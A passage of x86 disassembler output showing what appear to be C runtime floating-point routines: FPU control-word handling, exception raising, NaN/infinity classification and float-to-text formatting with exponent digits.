fld [ebp+var_C]
fcomp ds:dbl_4276F0
fnstsw ax
sahf
jnb short loc_419851
mov edx, ebx
jmp short loc_419853
; ---------------------------------------------------------------------------
loc_419851: ; CODE XREF: sub_4196BA+191�j
xor edx, edx
loc_419853: ; CODE XREF: sub_4196BA+195�j
mov al, byte ptr [ebp+var_C+6]
and eax, 0Fh
or al, 10h
mov word ptr [ebp+var_C+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_419887
sub eax, ecx
loc_41986A: ; CODE XREF: sub_4196BA+1CB�j
test byte ptr [ebp+var_C], bl
jz short loc_419875
test esi, esi
jnz short loc_419875
mov esi, ebx
loc_419875: ; CODE XREF: sub_4196BA+1B3�j
; sub_4196BA+1B7�j
shr dword ptr [ebp+var_C], 1
test byte ptr [ebp+var_C+4], bl
jz short loc_419881
or byte ptr [ebp+var_C+3], 80h
loc_419881: ; CODE XREF: sub_4196BA+1C1�j
shr dword ptr [ebp+var_C+4], 1
dec eax
jnz short loc_41986A
loc_419887: ; CODE XREF: sub_4196BA+1AC�j
test edx, edx
jz short loc_419893
fld [ebp+var_C]
fchs
fstp [ebp+var_C]
loc_419893: ; CODE XREF: sub_4196BA+183�j
; sub_4196BA+1CF�j
fld [ebp+var_C]
mov eax, [ebp+arg_4]
fstp qword ptr [eax]
jmp short loc_41989F
; ---------------------------------------------------------------------------
loc_41989D: ; CODE XREF: sub_4196BA+14E�j
mov esi, ebx
loc_41989F: ; CODE XREF: sub_4196BA+1E1�j
test esi, esi
pop esi
jz short loc_4198AC
push 10h
call sub_419BCB
pop ecx
loc_4198AC: ; CODE XREF: sub_4196BA+1E8�j
and edi, 0FFFFFFFDh
loc_4198AF: ; CODE XREF: sub_4196BA+26�j
; sub_4196BA+40�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_4198C6
test byte ptr [ebp+arg_8], 20h
jz short loc_4198C6
push 20h
call sub_419BCB
pop ecx
and edi, 0FFFFFFEFh
loc_4198C6: ; CODE XREF: sub_4196BA+1F9�j
; sub_4196BA+1FF�j
xor eax, eax
test edi, edi
pop edi
pop ebx
setz al
leave
retn
sub_4196BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4198D1(int,int,int,int,int,int,double,int)
sub_4198D1 proc near ; CODE XREF: sub_419218+2B�p
; .text:004192A2�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
push [ebp+arg_4]
call sub_41997F
test eax, eax
pop ecx
mov [ebp+var_1C], eax
jz short loc_41993C
mov eax, [ebp+arg_8]
push esi
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov esi, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
mov dword ptr [ebp+var_8+4], eax
call sub_419BA8
lea eax, [ebp+var_20]
push eax
call sub_41DB4D
add esp, 0Ch
test eax, eax
jnz short loc_419936
push esi
call sub_419959
pop ecx
loc_419936: ; CODE XREF: sub_4198D1+5C�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41993C: ; CODE XREF: sub_4198D1+14�j
push 0FFFFh
push [ebp+arg_20]
call sub_419BA8
push [ebp+arg_0]
call sub_419959
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_4198D1 endp
; =============== S U B R O U T I N E =======================================
sub_419959 proc near ; CODE XREF: sub_4192CA+7D�p
; .text:004193EC�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_419974
jle short locret_41997E
cmp eax, 3
jg short locret_41997E
mov dword_4927F4, 22h
retn
; ---------------------------------------------------------------------------
loc_419974: ; CODE XREF: sub_419959+7�j
mov dword_4927F4, 21h
locret_41997E: ; CODE XREF: sub_419959+9�j
; sub_419959+E�j
retn
sub_419959 endp
; =============== S U B R O U T I N E =======================================
sub_41997F proc near ; CODE XREF: sub_4198D1+9�p
arg_0 = dword ptr 4
xor ecx, ecx
mov eax, offset dword_435AD0
loc_419986: ; CODE XREF: sub_41997F+18�j
mov edx, [eax]
cmp edx, [esp+arg_0]
jz short loc_41999C
add eax, 8
inc ecx
cmp eax, offset dbl_435BA8
jl short loc_419986
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41999C: ; CODE XREF: sub_41997F+D�j
mov eax, off_435AD4[ecx*8]
retn
sub_41997F endp
; =============== S U B R O U T I N E =======================================
sub_4199A4 proc near ; CODE XREF: sub_4192CA+41�p
; .text:004193AF�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_4199B0
push 5
jmp short loc_4199C6
; ---------------------------------------------------------------------------
loc_4199B0: ; CODE XREF: sub_4199A4+6�j
test al, 8
jz short loc_4199B8
push 1
jmp short loc_4199C6
; ---------------------------------------------------------------------------
loc_4199B8: ; CODE XREF: sub_4199A4+E�j
test al, 4
jz short loc_4199C0
push 2
jmp short loc_4199C6
; ---------------------------------------------------------------------------
loc_4199C0: ; CODE XREF: sub_4199A4+16�j
test al, 1
jz short loc_4199C8
push 3
loc_4199C6: ; CODE XREF: sub_4199A4+A�j
; sub_4199A4+12�j ...
pop eax
retn
; ---------------------------------------------------------------------------
loc_4199C8: ; CODE XREF: sub_4199A4+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_4199A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4199D1(double)
sub_4199D1 proc near ; CODE XREF: sub_415D9B:loc_415E21�p
; sub_415EF3:loc_415F79�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
frndint
fstp [ebp+var_8]
fld [ebp+var_8]
leave
retn
sub_4199D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4199E3(double,int)
sub_4199E3 proc near ; CODE XREF: .text:00419A43�p
; sub_419ACA+82�p ...
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
mov ecx, [ebp+0Eh]
fld [ebp+arg_0]
add eax, 3FEh
and cx, 800Fh
fstp [ebp+var_8]
shl eax, 4
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_4199E3 endp
; ---------------------------------------------------------------------------
mov eax, [esp+0Ah]
shr eax, 4
and ax, 7FFh
sub eax, 3FEh
movsx eax, ax
retn
; ---------------------------------------------------------------------------
mov eax, [esp+0Ah]
mov ecx, [esp+0Ch]
shr eax, 4
and ax, 7FFh
movsx eax, ax
fld qword ptr [esp+4]
lea eax, [eax+ecx-3FEh]
push eax
push ecx
push ecx
fstp qword ptr [esp]
call sub_4199E3
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+10h]
mov ecx, [ebp+0Eh]
fld qword ptr [ebp+8]
shl eax, 4
fstp qword ptr [ebp-8]
and cx, 800Fh
or eax, ecx
mov [ebp-2], ax
fld qword ptr [ebp-8]
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A70 proc near ; CODE XREF: sub_415D9B+31�p
; sub_415EF3+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_419A87
cmp [ebp+arg_0], edx
jnz short loc_419A99
push 1
jmp short loc_419AC3
; ---------------------------------------------------------------------------
loc_419A87: ; CODE XREF: sub_419A70+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_419A99
cmp [ebp+arg_0], edx
jnz short loc_419A99
push 2
jmp short loc_419AC3
; ---------------------------------------------------------------------------
loc_419A99: ; CODE XREF: sub_419A70+11�j
; sub_419A70+1E�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_419AAC
push 3
jmp short loc_419AC3
; ---------------------------------------------------------------------------
loc_419AAC: ; CODE XREF: sub_419A70+36�j
cmp cx, 7FF0h
jnz short loc_419AC6
test [ebp+arg_4], 7FFFFh
jnz short loc_419AC1
cmp [ebp+arg_0], edx
jz short loc_419AC6
loc_419AC1: ; CODE XREF: sub_419A70+4A�j
push 4
loc_419AC3: ; CODE XREF: sub_419A70+15�j
; sub_419A70+27�j ...
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419AC6: ; CODE XREF: sub_419A70+41�j
; sub_419A70+4F�j
xor eax, eax
pop ebp
retn
sub_419A70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419ACA(double,int)
sub_419ACA proc near ; CODE XREF: sub_4196BA+160�p
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
fcomp ds:dbl_4276F0
push esi
fnstsw ax
sahf
jnz short loc_419AEA
fldz
xor esi, esi
fstp [ebp+var_8]
jmp loc_419B80
; ---------------------------------------------------------------------------
loc_419AEA: ; CODE XREF: sub_419ACA+12�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_419B59
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_419B02
cmp dword ptr [ebp+arg_0], ecx
jz short loc_419B59
loc_419B02: ; CODE XREF: sub_419ACA+31�j
fld [ebp+arg_0]
fcomp ds:dbl_4276F0
mov esi, 0FFFFFC03h
fnstsw ax
sahf
jnb short loc_419B1A
push 1
pop eax
jmp short loc_419B1C
; ---------------------------------------------------------------------------
loc_419B1A: ; CODE XREF: sub_419ACA+49�j
xor eax, eax
loc_419B1C: ; CODE XREF: sub_419ACA+4E�j
; sub_419ACA+69�j
test byte ptr [ebp+arg_0+6], 10h
jnz short loc_419B35
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_419B2F
or dword ptr [ebp+arg_0+4], 1
loc_419B2F: ; CODE XREF: sub_419ACA+5F�j
shl dword ptr [ebp+arg_0], 1
dec esi
jmp short loc_419B1C
; ---------------------------------------------------------------------------
loc_419B35: ; CODE XREF: sub_419ACA+56�j
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_419B43
or byte ptr [ebp+arg_0+7], 80h
loc_419B43: ; CODE XREF: sub_419ACA+73�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_4199E3
fstp [ebp+var_8]
add esp, 0Ch
jmp short loc_419B80
; ---------------------------------------------------------------------------
loc_419B59: ; CODE XREF: sub_419ACA+28�j
; sub_419ACA+36�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_4199E3
mov eax, dword ptr [ebp+arg_0+6]
add esp, 0Ch
fstp [ebp+var_8]
shr eax, 4
and ax, 7FFh
movsx esi, ax
sub esi, 3FEh
loc_419B80: ; CODE XREF: sub_419ACA+1B�j
; sub_419ACA+8D�j
mov eax, [ebp+arg_8]
fld [ebp+var_8]
mov [eax], esi
pop esi
leave
retn
sub_419ACA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B8B proc near ; CODE XREF: sub_419407+F6�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fstsw [ebp+var_2]
movsx eax, [ebp+var_2]
leave
retn
sub_419B8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B99 proc near ; CODE XREF: sub_419407+206�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fnstsw [ebp+var_2]
fnclex
movsx eax, [ebp+var_2]
leave
retn
sub_419B99 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419BA8 proc near ; CODE XREF: sub_415D9B+13�p
; sub_415D9B+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, eax
and eax, [ebp+arg_0]
not ecx
and ecx, [ebp+var_4]
or ecx, eax
mov [ebp+arg_4], ecx
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_419BA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419BCB proc near ; CODE XREF: sub_4196BA+1D�p
; sub_4196BA+37�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov cl, byte ptr [ebp+arg_0]
test cl, 1
jz short loc_419BE2
fld tbyte_435BD0
fistp [ebp+arg_0]
wait
loc_419BE2: ; CODE XREF: sub_419BCB+B�j
test cl, 8
jz short loc_419BF7
fstsw ax
fld tbyte_435BD0
fstp [ebp+var_8]
wait
fstsw ax
loc_419BF7: ; CODE XREF: sub_419BCB+1A�j
test cl, 10h
jz short loc_419C06
fld tbyte_435BDC
fstp [ebp+var_8]
wait
loc_419C06: ; CODE XREF: sub_419BCB+2F�j
test cl, 4
jz short loc_419C14
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_419C14: ; CODE XREF: sub_419BCB+3E�j
test cl, 20h
jz short locret_419C1F
fldpi
fstp [ebp+var_8]
wait
locret_419C1F: ; CODE XREF: sub_419BCB+4C�j
leave
retn
sub_419BCB endp
; =============== S U B R O U T I N E =======================================
sub_419C21 proc near ; CODE XREF: sub_415E6A+F�p
; .text:0041DBCB�p
push 30000h
push 10000h
call sub_41DBAC
pop ecx
pop ecx
retn
sub_419C21 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419C33 proc near ; CODE XREF: sub_419C71:loc_419C95�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_427700
fstp [ebp+var_8]
fld ds:dbl_4276F8
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp ds:dbl_4275E0
fnstsw ax
sahf
jbe short loc_419C6D
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_419C6D: ; CODE XREF: sub_419C33+33�j
xor eax, eax
leave
retn
sub_419C33 endp
; =============== S U B R O U T I N E =======================================
sub_419C71 proc near ; CODE XREF: sub_415E6A+5�p
push offset aKernel32 ; "KERNEL32"
call ds:dword_4953A8 ; GetModuleHandleA
test eax, eax
jz short loc_419C95
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:dword_4953C4 ; GetProcAddress
test eax, eax
jz short loc_419C95
push 0
call eax ; sub_415E6A
retn
; ---------------------------------------------------------------------------
loc_419C95: ; CODE XREF: sub_419C71+D�j
; sub_419C71+1D�j
jmp sub_419C33
sub_419C71 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419C9A proc near ; CODE XREF: sub_41AAED+3CB�p
; DATA XREF: sub_415E82+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_417C24
cmp eax, 65h
pop ecx
jz short loc_419CDA
loc_419CAE: ; CODE XREF: sub_419C9A+3E�j
inc esi
cmp dword_435E38, 1
jle short loc_419CC7
movsx eax, byte ptr [esi]
push 4
push eax
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_419CD6
; ---------------------------------------------------------------------------
loc_419CC7: ; CODE XREF: sub_419C9A+1C�j
movsx eax, byte ptr [esi]
mov ecx, off_435C2C
mov al, [ecx+eax*2]
and eax, 4
loc_419CD6: ; CODE XREF: sub_419C9A+2B�j
test eax, eax
jnz short loc_419CAE
loc_419CDA: ; CODE XREF: sub_419C9A+12�j
mov cl, byte_435E3C
mov al, [esi]
mov [esi], cl
inc esi
loc_419CE5: ; CODE XREF: sub_419C9A+56�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_419CE5
pop esi
retn
sub_419C9A endp
; =============== S U B R O U T I N E =======================================
sub_419CF4 proc near ; CODE XREF: sub_41AAED+3E2�p
; DATA XREF: sub_415E82+5�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dl, byte_435E3C
mov cl, [eax]
test cl, cl
jz short loc_419D10
loc_419D04: ; CODE XREF: sub_419CF4+1A�j
cmp cl, dl
jz short loc_419D10
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_419D04
loc_419D10: ; CODE XREF: sub_419CF4+E�j
; sub_419CF4+12�j
mov cl, [eax]
inc eax
test cl, cl
jz short locret_419D41
loc_419D17: ; CODE XREF: sub_419CF4+34�j
mov cl, [eax]
test cl, cl
jz short loc_419D2A
cmp cl, 65h
jz short loc_419D2A
cmp cl, 45h
jz short loc_419D2A
inc eax
jmp short loc_419D17
; ---------------------------------------------------------------------------
loc_419D2A: ; CODE XREF: sub_419CF4+27�j
; sub_419CF4+2C�j ...
mov ecx, eax
loc_419D2C: ; CODE XREF: sub_419CF4+3C�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_419D2C
cmp [eax], dl
jnz short loc_419D37
dec eax
loc_419D37: ; CODE XREF: sub_419CF4+40�j
; sub_419CF4+4B�j
mov dl, [ecx]
inc eax
inc ecx
test dl, dl
mov [eax], dl
jnz short loc_419D37
locret_419D41: ; CODE XREF: sub_419CF4+21�j
retn
sub_419CF4 endp
; =============== S U B R O U T I N E =======================================
sub_419D42 proc near ; DATA XREF: sub_415E82+28�o
; .data:off_435BF8�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp ds:dbl_4276F0
fnstsw ax
sahf
jb short loc_419D57
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_419D57: ; CODE XREF: sub_419D42+F�j
xor eax, eax
retn
sub_419D42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419D5A proc near ; CODE XREF: sub_41B320+430�p
; DATA XREF: sub_415E82+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_419D83
lea eax, [ebp+var_8]
push eax
call sub_41E148
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_419D83: ; CODE XREF: sub_419D5A+C�j
lea eax, [ebp+arg_8]
push eax
call sub_41E1A3
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [eax], ecx
leave
retn
sub_419D5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419D98 proc near ; CODE XREF: sub_41A015+17�p
; sub_41A05F+47�p
var_10 = qword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp byte_492858, 0
push ebx
push esi
jz short loc_419DCD
mov ebx, [ebp+arg_8]
mov eax, dword_492854
xor ecx, ecx
mov esi, eax
test ebx, ebx
setnle cl
push ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
setz cl
add ecx, [ebp+arg_4]
push ecx
call sub_41A0B0
pop ecx
pop ecx
jmp short loc_419E05
; ---------------------------------------------------------------------------
loc_419DCD: ; CODE XREF: sub_419D98+C�j
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+10h+var_10]
call sub_41E247
mov ebx, [ebp+arg_8]
mov esi, eax
push esi
mov edx, [ebp+arg_4]
lea eax, [ebx+1]
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
xor ecx, ecx
test ebx, ebx
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_41E1D0
add esp, 14h
loc_419E05: ; CODE XREF: sub_419D98+33�j
cmp dword ptr [esi], 2Dh
mov eax, [ebp+arg_4]
jnz short loc_419E11
mov byte ptr [eax], 2Dh
inc eax
loc_419E11: ; CODE XREF: sub_419D98+73�j
test ebx, ebx
jle short loc_419E29
mov cl, [eax+1]
push edi
lea edi, [eax+1]
mov [eax], cl
mov cl, byte_435E3C
mov eax, edi
pop edi
mov [eax], cl
loc_419E29: ; CODE XREF: sub_419D98+7B�j
xor ecx, ecx
push offset aE000 ; "e+000"
cmp byte_492858, cl
setz cl
add ecx, eax
add ecx, ebx
push ecx
call sub_4175D0
cmp [ebp+arg_C], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_419E50
mov byte ptr [ecx], 45h
loc_419E50: ; CODE XREF: sub_419D98+B3�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_419E95
mov ebx, [esi+4]
dec ebx
jns short loc_419E64
neg ebx
mov byte ptr [ecx], 2Dh
loc_419E64: ; CODE XREF: sub_419D98+C5�j
inc ecx
cmp ebx, 64h
jl short loc_419E7B
mov eax, ebx
push 64h
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_419E7B: ; CODE XREF: sub_419D98+D0�j
inc ecx
cmp ebx, 0Ah
jl short loc_419E92
mov eax, ebx
push 0Ah
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_419E92: ; CODE XREF: sub_419D98+E7�j
add [ecx+1], bl
loc_419E95: ; CODE XREF: sub_419D98+BF�j
mov eax, [ebp+arg_4]
pop esi
pop ebx
pop ebp
retn
sub_419D98 endp
; =============== S U B R O U T I N E =======================================
sub_419E9C proc near ; CODE XREF: sub_41A03C+13�p
; sub_41A05F+1E�p
var_18 = qword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp byte_492858, 0
push ebx
push ebp
mov ebp, [esp+8+arg_4]
push esi
push edi
jz short loc_419ED7
mov eax, dword_49285C
mov ebx, [esp+10h+arg_8]
mov esi, dword_492854
cmp eax, ebx
jnz short loc_419F07
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebp
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
jmp short loc_419F07
; ---------------------------------------------------------------------------
loc_419ED7: ; CODE XREF: sub_419E9C+F�j
mov eax, [esp+10h+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+18h+var_18]
call sub_41E247
mov ebx, [esp+18h+arg_8]
mov esi, eax
push esi
mov eax, [esi+4]
add eax, ebx
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, ebp
push eax
call sub_41E1D0
add esp, 14h
loc_419F07: ; CODE XREF: sub_419E9C+22�j
; sub_419E9C+39�j
cmp dword ptr [esi], 2Dh
mov edi, ebp
jnz short loc_419F15
mov byte ptr [ebp+0], 2Dh
lea edi, [ebp+1]
loc_419F15: ; CODE XREF: sub_419E9C+70�j
mov eax, [esi+4]
test eax, eax
jg short loc_419F2C
push 1
push edi
call sub_41A0B0
pop ecx
mov byte ptr [edi], 30h
pop ecx
inc edi
jmp short loc_419F2E
; ---------------------------------------------------------------------------
loc_419F2C: ; CODE XREF: sub_419E9C+7E�j
add edi, eax
loc_419F2E: ; CODE XREF: sub_419E9C+8E�j
test ebx, ebx
jle short loc_419F73
push 1
push edi
call sub_41A0B0
mov al, byte_435E3C
pop ecx
mov [edi], al
mov esi, [esi+4]
inc edi
pop ecx
test esi, esi
jge short loc_419F73
cmp byte_492858, 0
jz short loc_419F58
neg esi
jmp short loc_419F5E
; ---------------------------------------------------------------------------
loc_419F58: ; CODE XREF: sub_419E9C+B6�j
neg esi
cmp ebx, esi
jl short loc_419F60
loc_419F5E: ; CODE XREF: sub_419E9C+BA�j
mov ebx, esi
loc_419F60: ; CODE XREF: sub_419E9C+C0�j
push ebx
push edi
call sub_41A0B0
push ebx
push 30h
push edi
call sub_415CA0
add esp, 14h
loc_419F73: ; CODE XREF: sub_419E9C+94�j
; sub_419E9C+AD�j
pop edi
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_419E9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419F7A proc near ; CODE XREF: sub_41A05F+34�p
var_14 = qword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [edi]
fstp [esp+14h+var_14]
call sub_41E247
mov dword_492854, eax
mov ecx, [eax+4]
dec ecx
mov ebx, [ebp+arg_8]
mov dword_49285C, ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
push eax
push ebx
setz cl
add ecx, [ebp+arg_4]
mov esi, ecx
push esi
call sub_41E1D0
mov eax, dword_492854
add esp, 14h
mov ecx, [eax+4]
dec ecx
cmp dword_49285C, ecx
setl cl
mov byte_492860, cl
mov eax, [eax+4]
dec eax
cmp eax, 0FFFFFFFCh
mov dword_49285C, eax
jl short loc_41A000
cmp eax, ebx
jge short loc_41A000
test cl, cl
jz short loc_419FF1
loc_419FE7: ; CODE XREF: sub_419F7A+72�j
mov al, [esi]
inc esi
test al, al
jnz short loc_419FE7
and [esi-2], al
loc_419FF1: ; CODE XREF: sub_419F7A+6B�j
push ebx
push [ebp+arg_4]
push edi
call sub_41A03C
add esp, 0Ch
jmp short loc_41A010
; ---------------------------------------------------------------------------
loc_41A000: ; CODE XREF: sub_419F7A+63�j
; sub_419F7A+67�j
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
push edi
call sub_41A015
add esp, 10h
loc_41A010: ; CODE XREF: sub_419F7A+84�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_419F7A endp
; =============== S U B R O U T I N E =======================================
sub_41A015 proc near ; CODE XREF: sub_419F7A+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
mov byte_492858, 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_419D98
and byte_492858, 0
add esp, 10h
retn
sub_41A015 endp
; =============== S U B R O U T I N E =======================================
sub_41A03C proc near ; CODE XREF: sub_419F7A+7C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_8]
mov byte_492858, 1
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_419E9C
and byte_492858, 0
add esp, 0Ch
retn
sub_41A03C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A05F proc near ; CODE XREF: sub_41AAED+3AA�p
; DATA XREF: sub_415E82�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_41A09A
cmp [ebp+arg_8], 45h
jz short loc_41A09A
cmp [ebp+arg_8], 66h
jnz short loc_41A087
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419E9C
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41A087: ; CODE XREF: sub_41A05F+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419F7A
jmp short loc_41A0AB
; ---------------------------------------------------------------------------
loc_41A09A: ; CODE XREF: sub_41A05F+7�j
; sub_41A05F+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419D98
loc_41A0AB: ; CODE XREF: sub_41A05F+39�j
add esp, 10h
pop ebp
retn
sub_41A05F endp
; =============== S U B R O U T I N E =======================================
sub_41A0B0 proc near ; CODE XREF: sub_419D98+2C�p
; sub_419E9C+83�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_4]
test edi, edi
jz short loc_41A0D3
push esi
mov esi, [esp+8+arg_0]
push esi
call sub_4158E0
inc eax
push eax
push esi
add esi, edi
push esi
call sub_416430
add esp, 10h
pop esi
loc_41A0D3: ; CODE XREF: sub_41A0B0+7�j
pop edi
retn
sub_41A0B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A0D5 proc near ; CODE XREF: .text:0041607B�p
; sub_4160FE+1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
